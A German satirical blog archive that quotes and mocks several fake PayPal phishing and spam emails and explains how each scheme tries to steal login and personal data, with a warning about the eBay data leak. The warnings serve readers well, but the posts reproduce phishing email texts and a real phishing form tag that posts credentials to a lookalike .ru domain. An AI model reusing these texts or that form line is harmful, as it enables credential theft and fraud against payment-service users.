Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „PayPal“

Konto-Status

Donnerstag, 2. April 2015

Oh, wie schön: Etwas Phishing inmitten der ganzen Vorschussbetrüger. Bei welcher Bank bin ich denn heute mal wieder so sehr „Kunde“, dass sie nicht einmal meinen Namen kennt?

Lieber PayPal Kunde,

Ah ja, bei PayPal.

Aufgrund der jüngsten betrügerischen Aktivitäten haben wir ein neues Online-Sicherheitssystem für den maximalen Schutz der persönliche Daten [sic!] unserer Kunden gestartet.
Nach dieser Tatsache, [sic! Komischer Begriff und falsches Komma.] wird Ihnen angeboten, ihr PayPal-Konto zu aktualisieren.

Wie üblich, wenn PayPal mir schreibt, sind Grammatik, Wortwahl und Zeichensetzung ein bisschen komisch. Und wenn PayPal etwas an seiner Programmierung ändert, dann muss ich deshalb tätig werden. Ein großes Problem der Phisher ist und bleibt es, dass ihnen kaum gute Gründe einfallen, warum man jetzt seine Anmeldedaten auf einer anderen Seite als auf der Anmeldeseite eingeben sollte.

Um Ihr PayPal-Konto zu aktualisieren, liegt Ihnen in Ihrer E-Mail Adresse [sic! Deppen Leer Zeichen] ein Formular zur Verfügung [sic! Ausdruck].

Da dieser Phisher nicht so wirklich gut deutsch kann, weiß er auch nicht, wie er es ausdrücken soll, dass es einen Mailanhang gibt…

Bitte laden Sie das Formular aus [sic!], rufen Sie über Ihren Internet-Browser [sic!] und folgen Sie den Anweisungen auf dem Bildschirm.

…den man öffnen, ausfüllen und beklicken soll. Es handelt sich dabei um ein HTML-Dokument mit der stolzen Größe von 177,9 KiB, das einem die Möglichkeit einräumt, die gegenüber PayPal benutzte Kombination von Mailadresse und Passwort direkt an die organisierte Internet-Kriminalität zu senden. Dem Idioten, der diesen ziemlich aufgeblähten HTML-Code mutmaßlich aus der echten PayPal-Seite schnell zusammenkopiert hat, ohne ihn auch nur halbwegs zu verstehen…

Screenshot der Darstellung der angehängten HTML-Datei im Browser

…ist leider während der Arbeit sein Wörterbuch verloren gegangen, so dass er nicht mehr nachschlagen konnte, was „new“ denn jetzt auf deutsch heißt. :mrgreen:

Hinweis: Das Formular muss in einem modernen Browser geöffnet werden, dass JavaScript aktiviert hat [sic!]. (z.B. Internet Explorer, Mozilla Firefox)

Von nichts könnte ich weniger abraten als davon, einem Spammer das Privileg einzuräumen, Programmcode auszuführen. In diesem Fall wäre es relativ harmlos gewesen, denn hier dient ein verhältnismäßig komplexes Skript nur dazu, zu verbergen, dass die Daten nicht etwa an die Domain von PayPal gesendet werden, sondern an die ungleich weniger Vertrauen erweckende Domain s (punkt) psereu (punkt) us, die erst frisch vor einer Woche unter Angabe mutmaßlich irgendwo abgegriffener Daten registriert wurde. (Der vermutlich völlig unbeteiligte Einwohner der USA, dessen Identität hier von Verbrechern missbraucht wird, darf sich vermutlich in Kürze wegen des gewerbsmäßigen Computerbetrugs anderer Leute mit dem FBI herumschlagen. Das ist einer der Gründe, weshalb man sehr zurückhaltend mit seinen Daten umgehen sollte – egal, wie viel „Datenschutz“ auch versprochen wird.)

In einem zweiten Schritt „darf“ man übrigens einen umfassenden Datenstriptease hinlegen und jede Menge Daten gegenüber „PayPal“ angeben, die das echte PayPal schon lange kennt. Was machen die Verbrecher mit solchen Daten? Na ja, das übliche: Kreditkartenbetrug und hin und wieder mal unter einer fremden Identität auftreten, damit andere Leute ins Visier der Ermittler geraten.

Nach Abschluss dieser Phase [sic! Meinen die eine Mondphase?!] wird die Aktualisierung Ihres PayPal-Kontos normal funktionieren.

Genau wie vorher.

Wir entschuldigen uns für die Unannehmlichkeiten und danken Ihnen für Ihre Zeit.

Ja ja, ich verachte euch auch!

Für weitere Informationen kontaktieren Sie bitte den Kundenservice.

Es war offenbar kein Platz mehr auf dem Mailpapier, so dass nichts von Substanz gesagt werden konnte.

Mit freundlichen Grüßen,

PayPal-Team.

Ihr mich auch!

Sales Analysis for Your PayPal Account

Mittwoch, 11. März 2015

Nein, diese Spam kam nicht auf einer Mailadresse an, die ich ausschließlich für PayPal nutze und niemals öffentlich kommuniziere, sie landete in einem Honigtöpfchen, das ich so ausgelegt habe, dass es für Menschen unsichtbar ist, damit sich die Spam darin verfange. Es scheint sich um eine neue Herangehensweise an das Phishing zu handeln, und das ist natürlich interessant…

Dass die Mail nicht von PayPal kommt, erkennt man bereits an der Absenderadresse, die immer in der Domain paymetrics (punkt) com liegt. Natürlich wäre das richtige PayPal auch dazu imstande, seine Kunden mit Namen ansprechen und tut dies auch in jeder echten Mail von PayPal¹. Dieser Spammer verzichtet auf jede persönliche Anrede des Empfängers und behauptet…

Hello, Shannon Sofield, here. I‘m a developer for PayPal sellers and am writing to introduce a service which I think you will find helpful.

…dass er irgendein Entwickler von irgendwas mit PayPal sei, der mir eine ganz tolle Dienstleitung vorstellen möchte, die ich vielleicht nützlich finde. Dafür hat er sich natürlich auch einen hübschen Namen ausgedacht, wenn er schon nicht meinen Namen kennt. Diesen Namen hat er übrigens auch für die Registrierung der Domain angegeben, nebst seiner großartigen E-Mail-Adresse superfreaker (at) gmail (punkt) com.

Do you ever wish PayPal would provide you with sales reports and not just simply lists of transactions? Me too, that is why I created Paymetrics. It is a sales dashboard and reporting tool hat gives you an at-a-glance view of your business health.

Statt mir den tollen Dienst vorzustellen, stellt mir der freundliche mutmaßliche Betrüger aus der Spam aber nur eine Frage: „Wäre es nicht toll, wenns richtige Statistiken und Visualisierungen bei PayPal gäbe, so wie du sie auch vom Kontoauszug kennst… ach, kennst du gar nicht, und wenn du so etwas brauchst, dann nimmst du halt eine Tabellenkalkulation… also, wäre das nicht toll, wenn du so lauter tolle Linien und Kurven hättest?“ Dafür hat er eine tolle Anwendung gebaut, die aus den PayPal-Ereignissen Linien und Kurven macht, sozusagen ein Verkaufs-Cockpit, das dir die Gesundheit deines Geschäfts auf einem Blick vor Augen führt…

Ich muss mich jetzt jedenfalls erstmal vom Bullshit-Overflow erholen. :mrgreen:

I‘d like to make you part of our limited launch team by providing you with a free, Enterprise level Paymetrics account. For most people, this will cost $250 per month. But for a limited time, I am offering it to a select group of new users for free. No strings attached. Your account will be free forever.

Und das Ding zu nutzen, würde für die meisten Menschen auch nur noch fünf Läppchen mit Herrn Grant auf der Vorderseite und dem Capitol auf der Rückseite kosten. Aber weißte was?! Weil der Absender dich nicht kennt, hat er dich für eine Gruppe neuer Anwender ausgewählt und deshalb ist das für dich blinke blinke völlig kostenlos. Und zwar für den Rest der Ewigkeit. Ohne irgendwelche Pferdefüße. Versprochen. Großes Spammerehrenwort.

Paymetrics provides sales analysis and reporting for PayPal business accounts. It’s dashboard gives you a quick overview of your PayPal sales health. Plus, Paymetrics can take your PayPal data and turn it into just the kind of reports you need to help you increase revenue. You’ll love what this service can do for you.

So, jetzt noch einmal jede Menge Reklamesprech, um klarzumachen, warum dieser tolle Dienstleister auch unbedingt Zugriff auf ein PayPal-Konto haben muss…

All you need to do to access your free account is sign up and select the Basic account level here: https://www.paymetrics.com. Once you’ve signed-up, I will upgrade your Basic Paymetrics account to the Enterprise level, free of charge.

…und los, flugs zur Anmeldung. Der Link in der HTML-formatierten Spam ist übrigens – anders, als man auf dem ersten Blick glauben möchte – nicht direkt, sondern geht über ein Weiterleitungsskript, das an die Spammer zurückfunkt, dass die Spam angekommen ist und beklickt wurde. Dann erst geht es zu paymetrics (punkt) com, wobei allerdings…

Screenshot meines Terminals mit einer Ausgabe von lynx --mime_header für die Linkadresse

…wieder eine Menge lustiger Buchstaben- und Ziffernsalat an die URI drangehängt wird. (Die Weiterleitung ist nach Location: sichtbar, und ich habe hier ein paar Zeichen verpixelt.) Die Spammer sind im Moment generell dermaßen an solchen unfreiwilligen Bestätigungen von Mailadressen interessiert, dass es nicht mehr einfach möglich ist, ihnen durch eine kleine Nachbearbeitung ihrer Dreckslinks eine andere ID unterzujubeln. Schade… 👿

Natürlich ist dieser Spammer ein echter Wohltäter.

What do I want in return?

Nothing, really. I’m counting on the fact that you will love Paymetrics so much that you’ll start spreading the word across your social networks and others will sign up and use it too.

Der schenkt euch etwas und will dafür nichts zurückhaben. Außer vielleicht, dass man sich ein bisschen datennackig macht, um das Ding nutzen zu können, das einem geschenkt wurde:

Anmeldemaske für den über Spam beworbenen und mutmaßlich betrügerischen PayPal-Dienstleister 'Paymetrics'

Tja, und wer das gemacht hat, der hat Spammern folgende Möglichkeiten eröffnet:

  1. Wenn das Passwort wegen der üblichen Faulheit vieler Menschen auch bei PayPal funktioniert: Ein PayPal-Konto zur freien Nutzung.
  2. Wenn das Passwort wegen der seltenen Vorsicht einiger Menschen nicht bei PayPal funktioniert: Die Angabe der bei PayPal benutzten Mailadresse und ein dazu passender richtiger Name, so dass ein personalisiertes Phishing des bei PayPal benutzten Passwortes möglich ist. Schon diese Spam verheißt, dass es ein „gutes“ und sehr gefährliches Phishing werden wird.
  3. Als kostenloser Bonus kann eine Kombination von Mailadresse und Passwort an diversen Stellen durchprobiert und/oder an Kriminelle verkauft werden – nebst Namen zur Mailadresse, was viele Betrugsnummern erleichtert.

Und das alles nur, weil einer in einer Spam gesagt hat, dass er ein ganz tolles und sonst auch sehr teures Angebot für völlig umsonst nutzbar macht.

Let me know if you have any questions or comments on this new service. I’m always happy to hear from you,

Shannon (at) Paymetrics (punkt) com
https://www.paymetrics.com
Phone: 877-825-xxxx

Nur, um es zum Abschluss noch einmal ganz klar zu sagen: Diese Spam ging an eine Mailadresse, die eigens als kleine Falle für Spammer im Web ausgelegt wurde und die Menschen gar nicht erst zu Gesicht bekommen. Es ist eine klare Spam an eine Mailadresse, die mit einem Harvester eingesammelt wurde.

Spam ist niemals ein gutes Zeichen. Auch dann nicht, wenn die darin verlinkte URL mit HTTPS beginnt und ein kleines Schlösschen im Browser so tut, als sei die Seite sicher. (Die Kommunikation im Internet ist verschlüsselt, und das ist erstmal alles, was das Schlösschen sagt – was die Gegenstelle mit den Daten macht, kann niemals Gegenstand eines technischen Verfahrens sein.) Und auch nicht, wenn die zugehörige Website ausnahmsweise einmal gut aussieht (der Link geht auf einen Screenshot). Die versprochene Dienstleistung einer grafischen Visualisierung der PayPal-Kontobewegungen scheint mir nur möglich zu sein, wenn dieser Anbieter einen Zugriff auf das Konto bekommt. Damit gewährte man einem „Dienstleister“, dessen Angebot durch illegale und asoziale Spam bekannt gemacht wird, die Möglichkeit, Geld unter dem Deckmantel einer falschen Identität zu bewegen. Ich kann davon nur abraten, und wer mir das jetzt nicht glaubt, weil ich ja nur so ein Blogger bin, der frage doch bitte einfach die nächste Dienststelle der Polizei.

Finger weg von Paymetrics!

¹Eine namentliche Ansprache ist kein sicheres Erkennungszeichen mehr, dass es sich nicht um eine Spam handelt. Es gibt riesige, illegal gehandelte Datenbanken, die Mailadressen zu Namen zuordnen. Wo diese Daten herkommen? Von den Unternehmen, denen Menschen ihre Daten anvertraut haben.

[PayPal] : Update your information 26/02/2015 06:53:58

Donnerstag, 26. Februar 2015

Wenn ihr schon sonst nichts über mich wisst, könnt ihr wenigstens das Datum hinschreiben, denn das stimmt ja.

User Id : 4451874316854365, Shopping is faster, safer and easier with us

Genau das ist mein Name! :mrgreen:

Security Mesures

Und morgen lernst du in der Schule, wie man „measures“ richtig schreibt. Ach, die schwänzt du lieber, weil man ja auch ohne Bildung andere Leute betrügen kann? Na, dann lernst du es eben nicht.

Dear ,

Wie wärs mit einem Namen? Oder wenigstens „Dear customer“, damits nicht ganz so blöd aussieht… wenigstens für einen ganz, ganz klitzekleinen Moment…

Your account will be limited, until we here from you.
to update your info. simply click on the web address below
(or copy and paste the link into your browser)

Check It Here

Immerhin hast du dir einen anderen Linktext als „Click here“ einfallen lassen. Der ist zwar auch lächerlich und blöd, aber so gehts doch ein bisschen besser durch die Spamfilter. Denn „click here“ schreiben nur Leute, deren Müllmail man nicht lesen möchte, nur Spammer und Werber.

Danke übrigens, Spammer, für deine tolle Idee, das Linkziel über den URL-Kürzer tinyurl.com zu verschleiern, so dass die Links auf deine kriminelle Dreckssite ganz schnell unbrauchbar wurden! Bitte lern nichts daraus, wenn du schon ein Verbrecher bist!

[Notice] : If this email was sent to you in your Junk or Spam folder
Please mark it as not spam due to our new security update
Thanks.

Und das ist bis jetzt der lustigste Versuch des Jahres. Eine Aufforderung der Marke „Wenn dein Spamfilter funktioniert, ist das ein Fehler deines Spamfilters, korrigier den bitte“ in einer Spam. 😀

So, jetzt folgt noch ein wenig Füllmasse, die Inhalt vortäuschen soll, damit die dürftige Nachricht der Marke „Wir sperren grundlos dein Konto, klick mal und gib lauter Daten an, die wir schon kennen“ nicht ganz so auffällt.

This email was sent to ——, because your email preferences are set to receive „News and Promotions“. Click here to Unsubscribe.

Alles klar, nennt mich doch einfach —— 😀

To manage your communication preferences, please visit our preference centre.

Kann ich da auch einstellen, dass ich keine Spam mehr haben will?

Please do not reply to this email. We are unable to respond to inquiries sent to this address. For immediate answers to your questions, visit our Help Centre by clicking „Help“ located on any PayPal page or email.

Aber ich kann die Spam gar nicht beantworten. Als Absender steht meine eigene Mailadresse drin, damit auch ein halbamputiertes Minderhirn bemerken kann, dass der Absender gefälscht ist.

PayPal is committed to your privacy, learn more about our privacy policy.

Copyright É 2014 PayPal Inc., 500 King St. W, Toronto, ON M5V 1L9. All rights reserved.

Vor allem hat PayPal mit dieser Spam gar nichts zu tun. Vermutlich weiß PayPal auch, wie man so ein ©-Zeichen hinbekommt, um in großer Lächerlichkeit das „geistige Eigentum“ für den Text einer E-Mail zu deklarieren.

Aber immerhin…

26/02/2015 06:53:58

…das Datum stimmt. Es ist nur kein so guter Ersatz für eine Grußformel.

Der Zugriff auf Ihr Konto wurde eingeschrankt8-908-350-732

Samstag, 21. Februar 2015

Gesendet an gammelfleisch@tamagothi.de, meiner meist völlig ungelesenen Adresse für den Sondermüll – da wirds besonders lustig, wenn kreativ aus der Mailadresse eine „persönliche“ Anrede erzeugt wird:

Liebe gammelfleisch PayPal,
Ungewöhnliche Kontobewegungen haben es notwendig gemacht Ihr Konto einzugrenzen bis zusätzliche Informationen zur Überprüfung gesammelt werden.

Zur Zeit haben Sie nur begrenzten Zugang zu Ihrem Pay Pal Konto. Wir bitten Sie daher die von uns angeforderten Kontodaten zu enrneuern.

Bitte klicken Sie hier »

Copyright © 1999-2013 PayPal. Alle Rechte vorbehalten.
PayPal Pty Limited
ABN 78 555 575 877 (AFSL 2080820818)

Der Link führte natürlich nicht zu PayPal, sondern zur gecrackten Website eines größeren argentinischen Zuchtbetriebes, wo eine „liebevoll“ nachgebaute Login-Seite von PayPal abgelegt wurde. Dort war man immerhin so freundlich, den kriminellen Dreck sofort nach dem Hinweis vom Webserver zu entfernen.

Buy Fresh PayPal Accounts!

Freitag, 9. Januar 2015

Was man nicht alles kaufen kann…

#1 Source for PayPal accounts on the deep web!
http://ppshopxxxxxxxxxx.onion/

Klar, voll die Nummer Eins! Deshalb bedarf dieses tolle Angebot ja auch der Spam, die millionenfach in die Postfächer gemacht wird. Ich habe die Onion-Adresse hier mal mit ein paar „x“ unbrauchbar gemacht, es handelt sich ja sowieso um die Nummer Eins, die müsste also bei jedem Interessierten bekannt sein. 😀

We‘re selling hacked PayPal accounts from around the world, the list on our website shows what’s currently available. All accounts have a balance and most have linked bank accounts and credit cards.
We usually add fresh PayPal accounts weekly, and logins are checked and guaranteed to work or your money back!

Mit echter Geld-zurück-Garantie! Gegeben von einem Zeitgenossen, der keinen Hehl daraus macht, dass er schwerkriminell ist. Was kann da also schon schiefgehen?

Entweder haben die Spammer inzwischen wirklich so viele Accounts gephisht, dass sie gar keine Verwendung mehr dafür haben – vor ein paar Monaten ging zum Beispiel der Schwarzmarktpreis für verwendbare Kreditkartendaten mal in den Centbereich, weil es nach diversen Datenlecks so unfassbar viel davon gab – oder hier wird einfach nur betrogen. Ich tippe auf Letzteres. Für jene, die sich von diesem freundlichen Asozialen das Datenmaterial für ihren persönlichen Einstieg in einer kriminelle Karriere kaufen wollen, wird es also mit ziemlicher Sicherheit bedeuten, dass ihre kriminelle Karriere damit beginnt, erstmal als Betrogener auf der Opferseite zu stehen. Leider wird nicht jeder aus Schaden klug.

Wiederherstellung Ihres PayPal-Kontos

Donnerstag, 11. Dezember 2014

Wie, ist es jemanden aus der Hand geglitten und kaputt gegangen, das PayPal-Konto?

Sehr geehrter PayPal-Mitglied,

Ja, das stimmt. Ich bin mit Glied.

Während unserer regelmäßigen Kontoführung und Prüfverfahren haben wir einen kleinen Fehler in Ihrer erkannt Zahlungsinformationen.

Und bei euch ist Yoda der Deutschbeauftragte. Oder besser: Euch ist deutschbeauftragt Yoda bei.

Aber wo kommt er nun her, der erschröckliche Fehler, den ihr beim Kontoführen und Prüfen erkannt habt?

Dies könnte darauf zurückzuführen sein, aus den folgenden Gründen:

1. Eine aktuelle Änderung Ihrer persönlichen Daten (zB Online-Zahlungen, E-Mail-Adresse)

Ah, er kommt daher, dass PayPal für eine Online-Zahlung benutzt wurde, oder aber daher…

2. Die Unfähigkeit, genau überprüfen Sie Ihre gewählte Option der Zahlung aufgrund eines internen Fehlers in unseren Systemen.

…dass PayPal unfähig ist. :mrgreen:

Sie müssen, um Ihre Daten wiederherzustellen. Um dies zu tun, haben wir ein angebracht zu bilden, um diese E-Mail. Bitte laden Sie das Formular aus und befolgen Sie die Anweisungen auf dem Bildschirm.

HINWEIS: Das Formular muss in einem modernen Browser, der hat geöffnet werden Javascript enabled (ex: Internet Explorer, Firefox, Safari, Opera)

Wir bitten diese Informationen zu verifizieren und schützen Sie Ihre

Identität. Dies ist, um die illegale Aktivität verhindern PayPal-Konten.

Großartige Meisterschaft der Ausdrucksfähigkeit bringt man immer noch am besten zur Geltung, indem man ihren Fluss nicht mit Anmerkungen unterbricht. 😀

Bitte nicht auf diese E-Mail antworten.

Der Absender ist gefälscht.

Wir entschuldigen uns für etwaige Unannehmlichkeiten, die möglicherweise verursacht.

Ja, Phisher, ich entschuldige schon deine von dir selbst eingeräumte Unfähigkeit…

Mit freundlichen Grüßen, PayPal Security Team.

Copyright © 1999-2014 PayPal. All rights reserved.

PayPal (Europe) S.à r.l.et Cie, S.C.A.
Société en Commandite par Actions
Registered office: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349
PayPal Email ID PP7982

…immerhin hast du ja schon den Trick mit der Zwischenablage kapiert. Das schafft nicht jeder deiner „Kollegen“.

Und dein angehängtes HTML-Dokument, das ohne JavaScript nicht funktioniert, ist mal wieder echt göttlich:

Screenshot eines Details des angehängten HTML-Dokumentes im Editor

Schließlich kannst du dein <FORM>-Tag nicht einfach direkt reinschreiben, da stünde sonst ja drin…

<form method="post" onsubmit="return validateFormOnSubmit(this)" action="http://w.payplc.ru/de/cgi-bin/webscr.php?cmd=_logout">

…dass die eingegebenen Daten nicht etwa zur PayPal-Website gehen, sondern in die mittlerweile gewiss bei jedem Spamfilter dieser Welt bekannte Domain payplc (punkt) ru, die ganz frisch am 30. November eingerichtet wurde. Deshalb musst du diesen lächerlichen Umweg über Javascript gehen und darauf hoffen, dass die Spamfilter nicht dazu imstande sind, diese Kleinigkeit zu dechiffrieren. Du musst jetzt ganz tapfer sein, Spammer: Deine Hoffnung war vergebens.

Ach ja, und wo ich mir gerade deinen tollen HTML-Quältext anschaue: Wenn du das nächste Mal ein HTML-Dokument von PayPal in deinen Editor einfach reinkopierst, dann lösch doch bitte vorher das HTML-Gerüst, das dein Editor da reinmacht, um richtigen Webautoren die Arbeit zu erleichtern. Dieser Überrest mit einem leeren, neuen Dokument nach dem Ende des Dokumentes sieht doch ziemlich scheiße aus…

Wie, wenn du dir Mühe gäbest, könntest du auch gleich arbeiten gehen… ja, ich habs vergessen: Du bist eben ein dummer, asozialer, fauler und krimineller Spammer.

Aktueller Hinweis für ebay-Nutzer

Mittwoch, 29. Oktober 2014

Dies ist keine Spam, sondern ein kleiner Rückblick und eine aktuelle Warnung.

Im Februar dieses Jahres habe ich hier erstmals anhand eines einzigen Beispieles den Verdacht geäußert, das bei ebay ein Datenleck vorliegen könnte und habe dabei hoffentlich deutlich genug vor gutem, personalisierten Phishing gewarnt.

Dieses Datenleck wurde erst mehr als drei Monate später, im Mai dieses Jahres, von ebay bestätigt. Angreifern war es möglich, von ebay sportliche 145 Millionen Kundendatensätze mitzunehmen. Die Frage, warum ein Unternehmen wie ebay, das in dieser Weise mit Kundendaten umgeht und trotz einer monströs gewordenen organisierten Internet-Kriminalität seine Kunden drei Monate lang nicht vor möglichen Folgen des kriminellen Datenzugriffs warnt, überhaupt noch Kunden hat, kann ich auch nicht beantworten. Es gibt sicherlich einen völlig vernünftigen Grund dafür, den zu verstehen ich einfach zu dumm bin.

Seither zirkulieren die von ebay abgegriffenen Daten unter Kriminellen – und zurzeit werden, wie das LKA Niedersachsen mitteilt, diese Daten wieder einmal für sehr gefährliches, personalisiertes Phishing verwendet.

Meine Empfehlungen in dieser Sache

  1. Immer daran denken: Weder ebay noch PayPal versenden irgendwelche Mails mit der Aufforderung, an irgendwelchen Legitimationsprüfungen aus irgendwelchen Sicherheitsgründen teilzunehmen. Derartige Mails sind immer Spam.
  2. Eine eventuell bis Februar dieses Jahres gegenüber PayPal benutzte E-Mail-Adresse sollte sofort stillgelegt werden. Sie ist mit beachtlicher Wahrscheinlichkeit zusammen mit dem zugehörigen Namen und der zugehörigen Postanschrift unter Kriminellen bekannt und kann für sehr gefährliches personalisiertes Phishing verwendet werden. Eine Telefonnummer lässt sich oft aus offenen Quellen zusätzlich ermitteln, und die ebenfalls offen einsehbaren getätigten Geschäfte auf ebay lassen eine Abschätzung zu, bei welchen Personen sich ein aufwändig vorgetragener Betrug „lohnt“. Dies lässt es in meinen Augen als sicher erscheinen, dass irgendwann auf Grundlage dieser Daten sehr aufwändige und für den Betroffenen schwer durchschaubare Betrugsnummern unter Beteiligung von Briefpost- und Telefon-Verkehr durchgeführt werden.
  3. Ebay muss in seinem damaligen Umgang mit dem Datenabgriff als ein Unternehmen betrachtet werden, das kein Interesse daran zeigt, seine Kunden vor den möglichen kriminellen Folgen seines eigenen Versagens zu schützen. Wenn das Datenleck nicht an vielen anderen Stellen im Internet ruchbar und zum immer breiter rezipierten Gerücht geworden wäre, hätte ebay es seinen Kunden gegenüber vermutlich einfach verschwiegen. Das sollte Grund genug sein, nach Möglichkeit Distanz von ebay aufzusuchen.
  4. Generell ist davon abzuraten, überhaupt noch irgendwelche Daten im Internet gegenüber zentralistisch organisierten Strukturen (wie etwa Unternehmenswebsites) preiszugeben. Dies gilt in besonderer Weise, wenn dabei Geld oder wertvolle Güter bewegt werden, so dass eine kriminelle Attraktivität dieser Daten entsteht, die auch aufwändige Angriffe hervorbringt. (Vermutlich war der Angriff auf ebay aufwändig.) Diese Empfehlung kann ich erst relativieren, wenn Unternehmen bei Datenschutzversäumnissen im vollen Umfang für die Folgen haftbar gemacht werden können, was zurzeit nicht der Fall ist und was vermutlich auch so lange nicht der Fall sein wird, wie die so genannten „Volksvertreter“ in der Legislative mit zugestecktem Geld gefügig gemacht werden können.

Alles weitere kann bei der Polizei nachgelesen werden.

Das Problem: Paypal Uberprufung

Freitag, 17. Oktober 2014

Hui, ein Qualitätsbetreff! Die unfreiwillig lustige Bande von Phishern, die diese Spam verzapft hat, hat aber in der vergangenen Woche nicht so viel dazugelernt. Nur, um den schneckenhaft rasenden Lernerfolg von dummen Idioten, die naive Menschen betrügen wollen, besser zu dokumentieren, hier die tolle Spam des Tages in ihrer stilsicheren HTML-Formatierung – diesmal mit geringfügig mehr Text als beim letzten Mal, aber nicht mit mehr Inhalt:

Guten Tag!
Sehr geehrte/r Kunde/in! [sic! Doppelt hält besser!]

Wir bitten Sie um einer Unterstutzung bei der Freistellung Ihres PayPal Konto [sic!].
Es sind uns auffallige Aktivitaten aufgefallen [sic!] in der Zeit Ihrer letzen Anmeldung,
Ihr PayPal-Konto ist vorubergehend gesperrt

Wo liegt das Problem?
Bei Ihrer letzten Anmeldung sind uns auffallige Aktivitaten aufgefallen.

Was kann ich machen?
Bitte bestatigen Sie Ihre Personalitat durch folgenden Button [sic!] und fullen Ihre Personliche Daten ein [sic!], damit wir Ihr PayPal Konto freischalten konnen.
Schliesslich, konnen Sie Ihr Paypal-Konto wieder uneingeschrankt nutzen.

Klicken Sie bitte Jetzt Zugriff wiederherstellen.

Lassen Sie uns Ihr Konto gemeinsam wiederherstellen.
Nachdem Sie alle Schritte durchgefuhrt haben, antworten wir
Ihnen innerhalb von 72 Stunden.

Viele Grube!!

Und natürlich…

Copyright (c) PayPal 1999-2014 (Europe) S.r.l. et Cie, S.C.A. message ID: 4869215

…hat PayPal mit diesem Sondermüll gar nichts zu tun.